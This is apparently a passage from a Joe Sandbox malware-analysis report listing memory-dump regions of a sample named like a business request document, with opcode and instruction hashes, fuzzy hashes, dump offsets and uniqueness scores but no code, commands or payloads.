                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2e7436e61c0f4eba600a6db7c293dfabaf02297ccb898409039f79c8d0b46553
                                                                                                                                                    • Instruction ID: 04f37ddf5fab37185ce92461c4e678ef7e9b9e0990d31b249d40cad0784a8bfa
                                                                                                                                                    • Opcode Fuzzy Hash: 2e7436e61c0f4eba600a6db7c293dfabaf02297ccb898409039f79c8d0b46553
                                                                                                                                                    • Instruction Fuzzy Hash: 8ED05E34A0426CCBC7519F60D8203D97AB1EB45340F1080A9C54966294CA390A809F10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 563b2d33610111e23afc370866ff9b1464d138207a64b52fa66ba2eac641c8d4
                                                                                                                                                    • Instruction ID: a91027b8b29334825c0e49d7efc6d5260f26f45948629765eb2979fe80081c1d
                                                                                                                                                    • Opcode Fuzzy Hash: 563b2d33610111e23afc370866ff9b1464d138207a64b52fa66ba2eac641c8d4
                                                                                                                                                    • Instruction Fuzzy Hash: 0FC08C30700348AFCB05ABB8EC1812A37EAAFCC3113500028E80E87B52DFB2ECC28641
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: eca2eb741368b1f307ba25c22036a92befe41646232a244bd68e15096eeb9694
                                                                                                                                                    • Instruction ID: 29de3dea96a71599b329f4797b6ba4ffd0313c053ea28781a44b9544f0f2a302
                                                                                                                                                    • Opcode Fuzzy Hash: eca2eb741368b1f307ba25c22036a92befe41646232a244bd68e15096eeb9694
                                                                                                                                                    • Instruction Fuzzy Hash: 08D0C975044248DFCB40DB68D8448187B64EF1926071640D6F6044B232D27299A09B81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f5d4d79c41cebee46d1445ff4b016ee458c1c6fe28febd0e9f9fe40cd15a82bc
                                                                                                                                                    • Instruction ID: b0cdde96273b6c7937bb4f22a994e403ecf4aae60c73dbe2832a18aec7994d0b
                                                                                                                                                    • Opcode Fuzzy Hash: f5d4d79c41cebee46d1445ff4b016ee458c1c6fe28febd0e9f9fe40cd15a82bc
                                                                                                                                                    • Instruction Fuzzy Hash: B7D09E78F05328CFDB10DF14EC94B89B7B2BB45304F008199D80967358D7755984CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a6614d54f58e20f768831819ce8bc28f615dbd52f405f368bbf7075c10b9aee6
                                                                                                                                                    • Instruction ID: 8317560eb5236831ccce299c2220ca7871b57fcada2ecd111098fbc86d230b54
                                                                                                                                                    • Opcode Fuzzy Hash: a6614d54f58e20f768831819ce8bc28f615dbd52f405f368bbf7075c10b9aee6
                                                                                                                                                    • Instruction Fuzzy Hash: B0C012B65411408FD705DB108985449B711DB6023870486AD89354A2E6DE229503C615
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 395d0f6c21ae228e57bb49847c02d7b59b1c270177410e7e35b5ba9511d5f2c9
                                                                                                                                                    • Instruction ID: 71181fe07683247146afca35023e72d71738b2d8648fc65c4ea2439f8e18ec57
                                                                                                                                                    • Opcode Fuzzy Hash: 395d0f6c21ae228e57bb49847c02d7b59b1c270177410e7e35b5ba9511d5f2c9
                                                                                                                                                    • Instruction Fuzzy Hash: 34C04C76E1011DABCF10DBD9F4518DCF774EF94325F004036D214A7104D6311926CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                                                                                                                                    • Instruction ID: 2ad57114494cc740969b95bee8f444b209d5990da35e5c480c7824bf6c3857fe
                                                                                                                                                    • Opcode Fuzzy Hash: af8e06a732ca707132f27ef7a83e288a845aad2dfe2584e40d54ff240b01922d
                                                                                                                                                    • Instruction Fuzzy Hash: B7C09276140208EFC700DF69E844C45BBB8FF1976071180A1FA088B332C732E820DA94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 18b83e36c682f6a5717e28ebd0e33bc7c7a62bb7459d73978114b926da7619a5
                                                                                                                                                    • Instruction ID: f36bdf2114eee7525847bdd6b07a091a38c23bbcac45327e17778cdb3f34f542
                                                                                                                                                    • Opcode Fuzzy Hash: 18b83e36c682f6a5717e28ebd0e33bc7c7a62bb7459d73978114b926da7619a5
                                                                                                                                                    • Instruction Fuzzy Hash: CAC02B7090420457DF22A7B1994A35837101B11308F30008CD000090C69087140FC247
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e338ecb4c3cfbd3f450f1ba89d54a3bfb38e6f53a9b0ebdc67edbcc6f8ba07a1
                                                                                                                                                    • Instruction ID: d1657c32989fc492e9c2ee39a92df8b576e1853ab7aa261bf47c2e60092c8f75
                                                                                                                                                    • Opcode Fuzzy Hash: e338ecb4c3cfbd3f450f1ba89d54a3bfb38e6f53a9b0ebdc67edbcc6f8ba07a1
                                                                                                                                                    • Instruction Fuzzy Hash: BDC08C3030810CC7D30A6B60EA2479E3231F740700F840239500247195CBB85D05AA10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                    • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                                                                                                                    • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                                                                                                                    • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d192f105f2a63daeadaf4bdcd2cb48c4511685fff028baef41f0f9a53f2feedb
                                                                                                                                                    • Instruction ID: 2077dbc0ec42c98d16fb7627cda9071a86656c5d0659ccf462ee5819cdb52de0
                                                                                                                                                    • Opcode Fuzzy Hash: d192f105f2a63daeadaf4bdcd2cb48c4511685fff028baef41f0f9a53f2feedb
                                                                                                                                                    • Instruction Fuzzy Hash: 1AB09232000208AB86019B84ED04C56BB69AB597007008025E609065218B72E862DA94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3c0c6e45af2e58ac328067f4884fa5f6f1b8c2a7c7e34487ddd0d8c75a1331fc
                                                                                                                                                    • Instruction ID: 7ace320a41b2dae9939d7b9aace9fff304bbf463b6866d49217217353c0e75bc
                                                                                                                                                    • Opcode Fuzzy Hash: 3c0c6e45af2e58ac328067f4884fa5f6f1b8c2a7c7e34487ddd0d8c75a1331fc
                                                                                                                                                    • Instruction Fuzzy Hash: 84A012300002089B85005744EC05411B79C974A6043008054E40D025124B62F8418580
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0b1ea228e0269eba742d4bc80b4ed8c0baf25e69e0ef54fe8ae73bfd78b51944
                                                                                                                                                    • Instruction ID: 07cdf1de968253fe62c7801c7c536bc142fca0da171beff06a4884db0012b11d
                                                                                                                                                    • Opcode Fuzzy Hash: 0b1ea228e0269eba742d4bc80b4ed8c0baf25e69e0ef54fe8ae73bfd78b51944
                                                                                                                                                    • Instruction Fuzzy Hash: 7FA02238F002008FEF20BEE2B00E3BC3C00830A300F0000C2AF0A0C2CE80A08C00CBE2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 09899df0b3dede3e5b2e90ef0ab193b6065ca958e94b26d82980530df5f32ef0
                                                                                                                                                    • Instruction ID: e6f829193b93c23a0c4691df87455e5d2753df5b4e0dbcc98b81ba7f2417e1d4
                                                                                                                                                    • Opcode Fuzzy Hash: 09899df0b3dede3e5b2e90ef0ab193b6065ca958e94b26d82980530df5f32ef0
                                                                                                                                                    • Instruction Fuzzy Hash: 18A0021948D1A2075705B362A190465AB031AA14483D8078CC2410055385CA5665D9D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 92766f4f3268e6092dc7a8e32844122a3f103a09c62b2604d85a144eca65f837
                                                                                                                                                    • Instruction ID: a5e2a0506f5e89a9b66c72c80a9b073e38911c784e966c67ce8e07065509e337
                                                                                                                                                    • Opcode Fuzzy Hash: 92766f4f3268e6092dc7a8e32844122a3f103a09c62b2604d85a144eca65f837
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356255959.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$4'p$DB
                                                                                                                                                    • API String ID: 0-2170722040
                                                                                                                                                    • Opcode ID: dac3eaad0170b8ea966877b172736f6ab4a62e5d03a83be22d9afa4bb1e96e13
                                                                                                                                                    • Instruction ID: 5913745e37a97084d0923eed5eece17564ecbefb2f19cf6ae0c4da5576f3095e
                                                                                                                                                    • Opcode Fuzzy Hash: dac3eaad0170b8ea966877b172736f6ab4a62e5d03a83be22d9afa4bb1e96e13
                                                                                                                                                    • Instruction Fuzzy Hash: 86613BB1E012888BD759EF6AF88168EBBF3FFD8300F14C52AD0449F269DB3959459B50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$,p
                                                                                                                                                    • API String ID: 0-2293223000
                                                                                                                                                    • Opcode ID: 07cd2fe3ca07df067c49cb5561fcd6d31f4b20717ea8b378b886e82e3d664615
                                                                                                                                                    • Instruction ID: b008867e6bb2449a38d7f1f04aac3cefc2258e131ea1d91c27f7315b80019e84
                                                                                                                                                    • Opcode Fuzzy Hash: 07cd2fe3ca07df067c49cb5561fcd6d31f4b20717ea8b378b886e82e3d664615
                                                                                                                                                    • Instruction Fuzzy Hash: 67D11734A00A049FDB14DF68C584AADBBF2BF88310F29C599E515AB366EB34EC41CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: e2541f0a622e8cdf9e0136a07d808b6045eb6d469813eca964ff0329b0cd9f0a
                                                                                                                                                    • Instruction ID: efad239035ea57e15a169a30dcf2ba7355680fcd8a23d73bc513ebc9f8219060
                                                                                                                                                    • Opcode Fuzzy Hash: e2541f0a622e8cdf9e0136a07d808b6045eb6d469813eca964ff0329b0cd9f0a
                                                                                                                                                    • Instruction Fuzzy Hash: 33226A74B007119FCB19CF69C49466EFBF2BB88304F14852DEA5AD7395DB34A906CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: d7946044c0b2f3bfcda39e169b117934c99e4f9f72c8b1cbf199bd230314c19e
                                                                                                                                                    • Instruction ID: dddf6ec42c7cdbe66263bd76400eade8dabd0f47b6b8ae310610902148057973
                                                                                                                                                    • Opcode Fuzzy Hash: d7946044c0b2f3bfcda39e169b117934c99e4f9f72c8b1cbf199bd230314c19e
                                                                                                                                                    • Instruction Fuzzy Hash: 3B415371E05A58CBEB58CF6BDD4429EFAF3AFC8201F14D1B9C80CA6255EB3019969F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (
                                                                                                                                                    • API String ID: 0-3887548279
                                                                                                                                                    • Opcode ID: d2ebeb5aaccc06c2c745801d6df843da77573b393665361edc553b143229d89b
                                                                                                                                                    • Instruction ID: 14a2c79b75a5910b43e010bbc573948bb825ac46c721f78abc49d6a92f778c5b
                                                                                                                                                    • Opcode Fuzzy Hash: d2ebeb5aaccc06c2c745801d6df843da77573b393665361edc553b143229d89b
                                                                                                                                                    • Instruction Fuzzy Hash: 44417371D05A548FEB1CCF6B8D4029AFAF3AFC9200F18C0BAD85CAA255EB3409468F11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: F
                                                                                                                                                    • API String ID: 0-1304234792
                                                                                                                                                    • Opcode ID: 79972af93fb12f55b14dc9e77a88d5ce06f92af5c8be07806e5c9821cf72c405
                                                                                                                                                    • Instruction ID: 3875441938939e1ba6dfbe4f2b5534b90eb89ef6c7b3d13f9e1569eeb988ea73
                                                                                                                                                    • Opcode Fuzzy Hash: 79972af93fb12f55b14dc9e77a88d5ce06f92af5c8be07806e5c9821cf72c405
                                                                                                                                                    • Instruction Fuzzy Hash: 9A41CB71D056288BEB19CF5BC84839EBBF7AFC9300F14C1AAC40DA6258DB750A858F50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5019f6fb95b100e366332ad962b445ad245ebf16fc94687b1010295973d189a2
                                                                                                                                                    • Instruction ID: 30ee7f6aed79873105a5550cb4f6b9c54378ac486495696ea8a3a88d24d3859d
                                                                                                                                                    • Opcode Fuzzy Hash: 5019f6fb95b100e366332ad962b445ad245ebf16fc94687b1010295973d189a2
                                                                                                                                                    • Instruction Fuzzy Hash: 5312C771E006588BDB14CFAEC98069DFBF2BF88304F28C569D459EB21AD7359946CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4fda108cf9ab3c09b29958de86bdceac62586190af7af9a6e84c013a5c7e6fb7
                                                                                                                                                    • Instruction ID: ec3c69a127da1980be8cb606ed9331a5c387e5bddf7e75a9c27bb72b9f75bbbb
                                                                                                                                                    • Opcode Fuzzy Hash: 4fda108cf9ab3c09b29958de86bdceac62586190af7af9a6e84c013a5c7e6fb7
                                                                                                                                                    • Instruction Fuzzy Hash: 98B14A70E01308CFDB15DFA9E8847ADBBF2FB99300F10916AD419AB295DB765985DF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d61e46016d273104f3575aa85b4e20f56c38a256d64f854b7e1cb6853467248
                                                                                                                                                    • Instruction ID: c5e94c717eb370f011a30e5fee184b8a2c99851b1344f37bb54c43cc32c4f06f
                                                                                                                                                    • Opcode Fuzzy Hash: 4d61e46016d273104f3575aa85b4e20f56c38a256d64f854b7e1cb6853467248
                                                                                                                                                    • Instruction Fuzzy Hash: 84B13A70E01308CFDB15DFA9E9947ADBBF2FB89300F10916AD419AB295DB765885DF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 289a2865ef62a3443f7c6f87d1547da4b57bcb49844e6377a86a8b1a96e142c8
                                                                                                                                                    • Instruction ID: 104228622256883a4d9f98aa7953da347e56c1578e26e40d4c04af97bcee6b5b
                                                                                                                                                    • Opcode Fuzzy Hash: 289a2865ef62a3443f7c6f87d1547da4b57bcb49844e6377a86a8b1a96e142c8
                                                                                                                                                    • Instruction Fuzzy Hash: 55615A70E05218CFDB14DFA9D544BEDB7F6EB49304F00A16EEA09AB295CB355985CF04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ead3cf2c2f7f3567e206b28b52e3b596efbffe81fb11a35d02914b626d611ddf
                                                                                                                                                    • Instruction ID: f2bafa7bd154efb269f6401a904ede03761cb62217af92ee01fef9aabe6af138
                                                                                                                                                    • Opcode Fuzzy Hash: ead3cf2c2f7f3567e206b28b52e3b596efbffe81fb11a35d02914b626d611ddf
                                                                                                                                                    • Instruction Fuzzy Hash: 1371E370E14218CFDB24CFA9D894BADBFB2AF89304F1090A9D82DA7255DB759D85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c952cd463dd6c63e1348605844e9a0bab778f54e8b4d483aba9287dfec9f6cdf
                                                                                                                                                    • Instruction ID: 0d4544cc1448fa419bf51a29ed4db7fa12e6e821fdf5682d3713d3e0ca6a3e99
                                                                                                                                                    • Opcode Fuzzy Hash: c952cd463dd6c63e1348605844e9a0bab778f54e8b4d483aba9287dfec9f6cdf
                                                                                                                                                    • Instruction Fuzzy Hash: 4C616A70E05208CFDB10DFA9D544BEDB7F2EB49308F10A16EEA59AB255DB359981CF04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
